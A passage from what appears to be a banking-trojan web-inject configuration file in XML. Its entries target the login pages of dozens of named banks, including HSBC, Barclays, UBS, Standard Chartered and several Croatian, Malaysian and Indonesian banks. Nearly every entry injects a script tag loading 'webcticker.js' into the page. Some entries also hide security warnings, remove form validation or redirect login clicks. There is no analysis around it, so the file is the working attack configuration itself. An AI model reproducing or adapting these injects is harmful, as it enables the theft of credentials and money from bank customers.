3213. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3214. </modify>
3215. </actions>
3216. </httpinject>
3217. <httpinject>
3218. <conditions>
3219. <url type="allow" onpost="1" onget="1" modifiers="">^https://cbs\.ncbchina\.cn/corporbank/login\_basic\_e\.jsp(\?|$)</url>
3220. </conditions>
3221. <actions>
3222. <modify>
3223. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3224. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3225. </modify>
3226. </actions>
3227. </httpinject>
3228. <httpinject>
3229. <conditions>
3230. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bbmy\.ocbc\.com</url>
3231. </conditions>
3232. <actions>
3233. <modify>
3234. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3235. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3236. </modify>
3237. </actions>
3238. </httpinject>
3239. <httpinject>
3240. <conditions>
3241. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://elementa\.otpbanka\.hr/gradjani/.*/foweb/nb/eLEMENTa</url>
3242. </conditions>
3243. <actions>
3244. <modify>
3245. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3246. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3247. </modify>
3248. </actions>
3249. </httpinject>
3250. <httpinject>
3251. <conditions>
3252. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.otpbanka\.hr/english/welcome\.htm</url>
3253. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.otpbanka\.hr/html/dobrodosli\.htm</url>
3254. </conditions>
3255. <actions>
3256. <modify>
3257. <pattern modifiers="i"><![CDATA[onclick="provjera_fp]]></pattern>
3258. <replacement><![CDATA[onclick="window.location.href='https://elementa.otpbanka.hr/gradjani/OTP-gradjani.exe/foweb/nb/eLEMENTa';return false;this.focus]]></replacement>
3259. </modify>
3260. </actions>
3261. </httpinject>
3262. <httpinject>
3263. <conditions>
3264. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://net\.pbz\.hr/pbz365/logon.*</url>
3265. </conditions>
3266. <actions>
3267. <modify>
3268. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3269. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3270. </modify>
3271. </actions>
3272. </httpinject>
3273. <httpinject>
3274. <conditions>
3275. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://comnet\.pbz\.hr/PbzComnetWeb/app/logon\.html</url>
3276. </conditions>
3277. <actions>
3278. <modify>
3279. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3280. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3281. </modify>
3282. </actions>
3283. </httpinject>
3284. <httpinject>
3285. <conditions>
3286. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.permatae\-business\.com/corp/common/login\.do\?action=login</url>
3287. </conditions>
3288. <actions>
3289. <modify>
3290. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3291. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3292. </modify>
3293. </actions>
3294. </httpinject>
3295. <httpinject>
3296. <conditions>
3297. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://e\-finance\.postfinance\.ch/(ef/secure|secure/fp)/html/</url>
3298. </conditions>
3299. <actions>
3300. <modify>
3301. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
3302. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3303. </modify>
3304. </actions>
3305. </httpinject>
3306. <httpinject>
3307. <conditions>
3308. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://direkt\.rba\.hr/cgi\-bin/ppz2/start/rbat\.jsp</url>
3309. </conditions>
3310. <actions>
3311. <modify>
3312. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3313. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3314. </modify>
3315. </actions>
3316. </httpinject>
3317. <httpinject>
3318. <conditions>
3319. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)</url>
3320. </conditions>
3321. <actions>
3322. <modify>
3323. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3324. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3325. </modify>
3326. </actions>
3327. </httpinject>
3328. <httpinject>
3329. <conditions>
3330. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://logon\.reflex\.rhbbank\.com\.my/rhbcams/corporate/login\.jsp</url>
3331. </conditions>
3332. <actions>
3333. <modify>
3334. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3335. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3336. </modify>
3337. </actions>
3338. </httpinject>
3339. <httpinject>
3340. <conditions>
3341. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.sbnet\.splitskabanka\.hr/priv/.*/dciweb\.htm</url>
3342. </conditions>
3343. <actions>
3344. <modify>
3345. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3346. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3347. </modify>
3348. </actions>
3349. </httpinject>
3350. <httpinject>
3351. <conditions>
3352. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://mcsign\.ba\-ca\.com/smartoffice/\_mcologon\?\.\.OASLogon</url>
3353. </conditions>
3354. <actions>
3355. <modify>
3356. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3357. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3358. </modify>
3359. </actions>
3360. </httpinject>
3361. <httpinject>
3362. <conditions>
3363. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)</url>
3364. </conditions>
3365. <actions>
3366. <modify>
3367. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3368. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3369. </modify>
3370. <modify>
3371. <pattern modifiers="i"><![CDATA[div class="scbLoginImpContainer01"]]></pattern>
3372. <replacement><![CDATA[div class="scbLoginImpContainer01" style="display:none;"]]></replacement>
3373. </modify>
3374. </actions>
3375. </httpinject>
3376. <httpinject>
3377. <conditions>
3378. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event</url>
3379. </conditions>
3380. <actions>
3381. <modify>
3382. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3383. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3384. </modify>
3385. </actions>
3386. </httpinject>
3387. <httpinject>
3388. <conditions>
3389. <url type="allow" onpost="1" onget="1" modifiers="">^https://ibank\.standardchartered\.com\.hk/nfs/login\.htm(\?|$)</url>
3390. </conditions>
3391. <actions>
3392. <modify>
3393. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3394. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3395. </modify>
3396. </actions>
3397. </httpinject>
3398. <httpinject>
3399. <conditions>
3400. <url type="allow" onpost="1" onget="1" modifiers="">^https://ibank\.standardchartered\.com\.sg/nfs/login\.htm(\?|$)</url>
3401. </conditions>
3402. <actions>
3403. <modify>
3404. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
3405. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3406. </modify>
3407. </actions>
3408. </httpinject>
3409. <httpinject>
3410. <conditions>
3411. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.onlinesbiglobal\.com/\S+/BANKAWAY($|\?|\;)</url>
3412. </conditions>
3413. <actions>
3414. <modify>
3415. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3416. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3417. </modify>
3418. </actions>
3419. </httpinject>
3420. <httpinject>
3421. <conditions>
3422. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ebanking\-ch\d+\.ubs\.com/workbench/Index\.do</url>
3423. </conditions>
3424. <actions>
3425. <modify>
3426. <pattern modifiers=""><![CDATA[(</html>)]]></pattern>
3427. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
3428. <!--
3429. <script type="text/javascript" language="JavaScript">
3430. setTimeout(function() {
3431. document.body.style.visibility = 'visible';
3432. }, 7000);
3433. </script>
3434. -->
3435. ]]></replacement>
3436. </modify>
3437. <modify>
3438. <pattern modifiers=""><![CDATA[(div id="div_securityinfo_content")]]></pattern>
3439. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
3440. </modify>
3441. </actions>
3442. </httpinject>
3443. <httpinject>
3444. <conditions>
3445. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.ucoebanking\.com/BankAwayRetail/.*/web/L001/retail/jsp/user/CorporateSignOn\.aspx(\?|$)</url>
3446. </conditions>
3447. <actions>
3448. <modify>
3449. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
3450. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3451. </modify>
3452. </actions>
3453. </httpinject>
3454. <httpinject>
3455. <conditions>
3456. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://uniservices\d*\.uobgroup\.com/(ELO/login\.jsp|wpe/ca/login\.do|wpe/ca/loginForm\.jsp)(\;|\?|$)</url>
3457. </conditions>
3458. <actions>
3459. <modify>
3460. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
3461. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3462. </modify>
3463. </actions>
3464. </httpinject>
3465. <httpinject>
3466. <conditions>
3467. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://biz\.uob\.com\.my/ELO/login\.jsp</url>
3468. </conditions>
3469. <actions>
3470. <modify>
3471. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3472. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3473. </modify>
3474. </actions>
3475. </httpinject>
3476. <httpinject>
3477. <conditions>
3478. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.vietcombank\.com\.vn/ibanking/Default\.aspx</url>
3479. </conditions>
3480. <actions>
3481. <modify>
3482. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3483. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3484. </modify>
3485. <modify>
3486. <pattern modifiers="i"><![CDATA[color: Red; font\-weight: bold;]]></pattern>
3487. <replacement><![CDATA[color: Red; font-weight: bold; display:none;]]></replacement>
3488. </modify>
3489. </actions>
3490. </httpinject>
3491. <httpinject>
3492. <conditions>
3493. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.vietinbank\.vn/ipay/vbh/login\.do</url>
3494. </conditions>
3495. <actions>
3496. <modify>
3497. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3498. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3499. </modify>
3500. <modify>
3501. <pattern modifiers="isU"><![CDATA[\$\("#login"\)\.validationEngine \(\{.*\}\);]]></pattern>
3502. <replacement><![CDATA[]]></replacement>
3503. </modify>
3504. </actions>
3505. </httpinject>
3506. <httpinject>
3507. <conditions>
3508. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.winglungbank\.com/corpbanking/logon/CbHomLogonInp\.jsp(\?|$)</url>
3509. </conditions>
3510. <actions>
3511. <modify>
3512. <pattern modifiers="isA"><![CDATA[(.+</form>)]]></pattern>
3513. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3514. </modify>
3515. </actions>
3516. </httpinject>
3517. <httpinject>
3518. <conditions>
3519. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.zaba\.hr/ebank/gradjani/InnerLogin\.jsp</url>
3520. </conditions>
3521. <actions>
3522. <modify>
3523. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3524. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3525. </modify>
3526. </actions>
3527. </httpinject>
3528. <httpinject>
3529. <conditions>
3530. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.irakyat\.com\.my/retail/security/commonLogin\.jsp</url>
3531. </conditions>
3532. <actions>
3533. <modify>
3534. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3535. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3536. </modify>
3537. </actions>
3538. </httpinject>
3539. <httpinject>
3540. <conditions>
3541. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mybsn\.com\.my/mybsn/login/login\.do</url>
3542. </conditions>
3543. <actions>
3544. <modify>
3545. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3546. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3547. </modify>
3548. </actions>
3549. </httpinject>
3550. <httpinject>
3551. <conditions>
3552. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.bni\.co\.id/corp/AuthenticationController</url>
3553. </conditions>
3554. <actions>
3555. <modify>
3556. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3557. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ibank/scripts/webcticker.js"></script>]]></replacement>
3558. </modify>
3559. </actions>
3560. </httpinject>
3561. <httpinject>
3562. <conditions>
3563. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\.bri\.co\.id/ib\-bri/Login\.html</url>
3564. </conditions>
3565. <actions>
3566. <modify>
3567. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3568. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3569. </modify>
3570. </actions>
3571. </httpinject>
3572. <httpinject>
3573. <conditions>
3574. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\.bankmandiri\.co\.id/retail/Login\.do</url>
3575. </conditions>
3576. <actions>
3577. <modify>
3578. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3579. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3580. </modify>
3581. </actions>
3582. </httpinject>
3583. <httpinject>
3584. <conditions>
3585. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.danamonline\.com/onlinebanking/Login/lgn_new\.aspx</url>
3586. </conditions>
3587. <actions>
3588. <modify>
3589. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3590. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3591. </modify>
3592. </actions>
3593. </httpinject>
3594. <httpinject>
3595. <conditions>
3596. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibank\.klikbca\.com</url>
3597. </conditions>
3598. <actions>
3599. <modify>
3600. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
3601. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3602. </modify>
3603. </actions>
3604. </httpinject>
3605. <httpinject>
3606. <conditions>
3607. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.hsbc\.co\.uk/1/2/</url>
3608. </conditions>
3609. <actions>
3610. <modify>
3611. <pattern modifiers="msU"><![CDATA[(</form>)]]></pattern>
3612. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3613. </modify>
3614. </actions>
3615. </httpinject>
3616. <httpinject>
3617. <conditions>
3618. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://bank\.barclays\.co\.uk/olb/auth/LoginLink\.action</url>
3619. </conditions>
3620. <actions>
3621. <modify>
3622. <pattern modifiers="Ui"><![CDATA[(</body>)]]></pattern>
3623. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
3624. </modify>
3625. </actions>
3626. </httpinject>
3627. <httpinject>
3628. <conditions>
3629. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.cafbank\.org</url>
3630. </conditions>
3631. <actions>
3632. <modify>
3633. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
3634. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3635. </modify>
3636. </actions>
3637. </httpinject>
3638. <httpinject>
3639. <conditions>
3640. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cardsonline\-commercial\.com/RBSG\_Commercial/.*Login\.do
3641. </url>
3642. </conditions>
3643. <actions>
3644. <modify>
3645. <pattern modifiers="iU"><![CDATA[(</htQQQQQml>)]]></pattern>
3646. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3647. </modify>
3648. </actions>
3649. </httpinject>
3650. <httpinject>
3651. <conditions>
3652. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.*/fi\d+/bb/logon</url>
3653. </conditions>
3654. <actions>
3655. <modify>
3656. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
3657. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
3658. </modify>
3659. </actions>
3660. </httpinject>
3661. <httpinject>
3662. <conditions>
3663. <url type="allow" onpost="1" onget="1" modifiers="iU">ya\.ru</url>
3664. </conditions>
3665. <actions>
3666. <modify>
3667. <pattern modifiers="i"><![CDATA[<title>]]></pattern>
3668. <replacement><![CDATA[<title>XXXYA: ]]></replacement>
3669. </modify>
3670. </actions>
3671. </httpinject>
3672. </httpinjects>
3673. </settings>